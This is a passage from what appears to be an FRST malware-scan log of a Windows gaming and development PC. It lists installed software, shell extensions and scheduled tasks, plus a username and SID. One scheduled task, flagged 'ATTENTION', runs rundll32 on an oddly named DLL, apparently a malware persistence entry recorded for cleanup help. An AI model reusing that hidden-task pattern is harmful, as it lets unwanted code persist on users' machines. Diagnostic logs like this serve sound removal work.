Honorbuddy (HKLM-x32\...\{6D8FB164-2A7D-43B2-A59E-E16BF56C8AB0}) (Version: 3.0.17441.887 - Bossland GmbH) Hidden
Honorbuddy (HKLM-x32\...\{ef04a8e2-b971-4fe9-875b-a35cc6b998d7}) (Version: 3.0.17441.887 - Bossland GmbH)
IIS 10.0 Express (HKLM\...\{13FD7E30-D2F1-498D-ABC2-A4242DB6610E}) (Version: 10.0.1736 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - )
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - )
Java 8 Update 151 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180151F0}) (Version: 8.0.1510.12 - Oracle Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Version Manager (x64) 1.0.0-beta5 (HKLM\...\{c5a4aba3-1aba-3ef8-b2d5-c3fa37f59738}) (Version: 1.0.10609.0 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Office Excel Viewer (HKLM-x32\...\{95120000-003F-0409-0000-0000000FF1CE}) (Version: 12.0.6219.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{E359515A-92E6-4FA3-A2C9-E1BA02D8DE6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (HKLM-x32\...\{0F1C8E2F-199A-4946-B3BF-0906DACFD032}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (x64) (HKLM\...\{20EA85AA-2A1D-4F11-B09F-4BA2BF3C8989}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL Language Service  (HKLM-x32\...\{8BFDE775-C5B8-46DB-84EF-43FFC8A2E8AD}) (Version: 13.0.14500.10 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL ScriptDom  (HKLM\...\{D091DE8C-EA0F-49AF-8DE3-BD6C79737C6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - enu (14.0.60519.0) (HKLM-x32\...\{4E27B0EF-7BAB-432A-AF3D-3FC8F3F7353F}) (Version: 14.0.60519.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM\...\{96EB5054-C775-4BEF-B7B9-AA96A295EDCD}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM-x32\...\{84C23ECA-FE4D-494F-9247-3EBAD57E7F0C}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 with Updates (HKLM-x32\...\{79b486b9-c5f0-4096-a00c-8351f59587c2}) (Version: 14.0.25420.1 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Mozilla Firefox 57.0 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0 (x64 en-US)) (Version: 57.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0 - Mozilla)
MSBuild/NuGet Integration 14.0 (x86) (HKLM-x32\...\{128C1654-3B9E-4959-8BFB-CE6F09C0A01D}) (Version: 14.0.25420 - Microsoft Corporation) Hidden
MU LEGEND GLOBAL (HKLM-x32\...\{MU2GB92C-VH2O-Z2AQ-N26J-M2VJEWJEUE52}_is1) (Version: 1.0.0.0 - Webzen)
Multi-Device Hybrid Apps using C# - Templates - ENU (HKLM-x32\...\{12D99739-FFD3-3761-8AA6-F929E0FE407E}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
NaturalReader 14 Free (HKLM-x32\...\{773ED0E5-538E-4E86-8E00-719630613290}) (Version: 1.00.0000 - Naturalsoft)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.1 - Notepad++ Team)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.13 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.10.0.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.10.0.95 - NVIDIA Corporation)
NVIDIA Graphics Driver 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.13 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.35.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.35.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Path of Exile (HKLM-x32\...\{89c396e9-fa65-4c5a-8e98-3ba1801b209d}) (Version: 2.6.0.7280 - Grinding Gear Games)
Path of Exile (HKLM-x32\...\{90A4562F-D4A1-4B65-906D-41F236CF6902}) (Version: 2.6.0.7280 - Grinding Gear Games) Hidden
PreEmptive Analytics Visual Studio Components (HKLM-x32\...\{436A18DD-5F2C-4B3C-985E-AD3C13B0CC25}) (Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Prerequisites for SSDT  (HKLM-x32\...\{21373064-AD95-48DB-A32E-0D9E08EF7355}) (Version: 12.0.2000.8 - Microsoft Corporation)
Prerequisites for SSDT  (HKLM-x32\...\{B7E94916-7AE6-4F7F-A377-7A410A42BA19}) (Version: 13.0.1601.5 - Microsoft Corporation)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.3.723.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7640 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.4 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.4 - VS Revo Group, Ltd.)
RogueKiller version 12.11.25.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.11.25.0 - Adlice Software)
Roslyn Language Services - x86 (HKLM-x32\...\{6970C7E1-F99D-388D-8903-DF8FCE677FED}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (HKLM-x32\...\{6C1985E7-E1C5-3A95-86EF-2C62465F15C3}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
RuneMate (HKLM-x32\...\5153-2584-1271-2038) (Version: 2.74.0.0 - Team RuneMate)
RuneScape Launcher 1.2.7 (HKLM-x32\...\{FA52A2D0-298E-4D40-8BB7-39928627EA6A}) (Version: 1.2.7 - Jagex Ltd)
RuneScape Launcher 2.2.4 (HKLM\...\RuneScape Launcher_is1) (Version: 2.2.4 - Jagex Ltd)
SlimDX Runtime .NET 4.0 x86 (January 2012) (HKLM-x32\...\{7EBD0E43-6AC0-4CA8-9990-00E50069AD29}) (Version: 2.0.13.43 - SlimDX Group)
Spotify (HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Spotify) (Version: 1.0.67.582.g19436fa3 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Explorer for Microsoft Visual Studio 2015 Update 3.1 (HKLM-x32\...\{7A95671A-759E-3B83-B763-4289D1D24D73}) (Version: 14.102.25619 - Microsoft) Hidden
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.1.4 - TeamSpeak Systems GmbH)
Test Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{9EABBFE1-7EED-47D9-8FB8-21D7E4808057}) (Version: 14.0.23107 - Microsoft Corporation) Hidden
TortoiseSVN 1.9.4.27285 (64 bit) (HKLM\...\{62C19AB2-8485-4E18-A9D3-EFA612B8AE74}) (Version: 1.9.27285 - TortoiseSVN)
Twitch (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Twitch Interactive, Inc.)
TypeScript Power Tool (HKLM-x32\...\{465ACA24-B8D6-4FEC-A42D-9EFCB92CD560}) (Version: 1.8.34.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{BA5762C7-D35F-4725-A4BD-525854127018}) (Version: 1.8.36.0 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation)
VS Update core components (HKLM-x32\...\{B2918D01-1D89-34D3-87EF-A28121BC6EB7}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
vs_update3notification (HKLM-x32\...\{AB3DF932-C990-34D4-BF43-970F760DA3CD}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
WCF Data Services 5.6.4 Runtime (HKLM-x32\...\{DB85E7BD-B2DD-43D4-B3C0-23D7B527B597}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{0A3B508E-5638-4471-BCC9-954E1868CB86}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Windows Driver Package - Sony Computer Entertainment Inc. Wireless controller for PLAYSTATION®3 Driver Package (01/20/2012 1.4.0.0) (HKLM\...\D5410AE5FA467EF0F19558D5F60C991A79E11B51) (Version: 01/20/2012 1.4.0.0 - Sony Computer Entertainment Inc.)
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ShellIconOverlayIdentifiers: [  Tortoise1Normal] -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise2Modified] -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise3Conflict] -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise4Locked] -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise5ReadOnly] -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise6Deleted] -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise7Added] -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise8Ignored] -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers: [  Tortoise9Unversioned] -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise1Normal] -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise2Modified] -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise3Conflict] -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise4Locked] -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise5ReadOnly] -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise6Deleted] -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise7Added] -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise8Ignored] -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ShellIconOverlayIdentifiers-x32: [  Tortoise9Unversioned] -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll [2015-08-25] (hxxp://tortoisesvn.net)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-11-27] ()
ContextMenuHandlers1: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers2: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers4: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-10-27] (NVIDIA Corporation)
ContextMenuHandlers5: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers6: [TortoiseSVN] -> {30351349-7B7D-4FCC-81B4-1E394CA267EB} => C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll [2016-04-24] (hxxp://tortoisesvn.net)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {076BC339-BC85-403B-95C7-69876BA51B1A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-07] (Google Inc.)
Task: {4B31A75B-7D44-4F0C-A6A1-590301A96911} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-10-10] (NVIDIA Corporation)
Task: {524CDDAD-0555-4C55-9A9C-48B9E1C3F637} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-10-10] (NVIDIA Corporation)
Task: {57150746-8FA2-4723-99AB-36FBBFACA96C} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-10-10] (NVIDIA Corporation)
Task: {59696C24-2DEA-4C0C-B14B-BC31F35F0CB5} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_27_0_0_187_pepper.exe [2017-11-14] (Adobe Systems Incorporated)
Task: {6DE67E11-CB11-4717-9B3B-73CB8A3A7D75} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-04-10] (Piriform Ltd)
Task: {846E8134-C0E0-4B18-AACD-E14F899B8AF3} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-10-10] (NVIDIA Corporation)
Task: {8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} - System32\Tasks\Yaminguict Explorer for ERC => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll",eWMujhpWxRLj <==== ATTENTION
Task: {98224195-71D3-447E-91DC-7F6F27DF300D} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-06-20] (Microsoft Corporation)
Task: {9CB2B651-76EE-4B7E-B959-ECBEC35184F5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-10-10] (NVIDIA Corporation)
Task: {A5C38955-3E49-4B8A-8485-4930A82542F6} - System32\Tasks\Shutdown => C:\Windows\System32\shutdown.exe [2017-03-18] (Microsoft Corporation)
Task: {BF563365-7221-44D8-ADFD-B9C0F3D91610} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-10-10] (NVIDIA Corporation)
Task: {C0C81543-CAB6-4BD6-896A-4E5A40BBAF1E} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-10-10] (NVIDIA Corporation)
Task: {DAE8A708-6D46-403F-A001-F1EA529A74D2} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWoW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-11-14] (Adobe Systems Incorporated)
Task: {EFC5AC87-EA1A-4793-9C76-FD3F841A305B} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-10-10] (NVIDIA Corporation)
Task: {F092AFF2-F08D-4AF4-9B0D-749FAB094EF1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-07] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
ShortcutWithArgument: C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) ==============
 
2017-11-20 23:50 - 2017-11-20 23:50 - 002249216 _____ () C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll
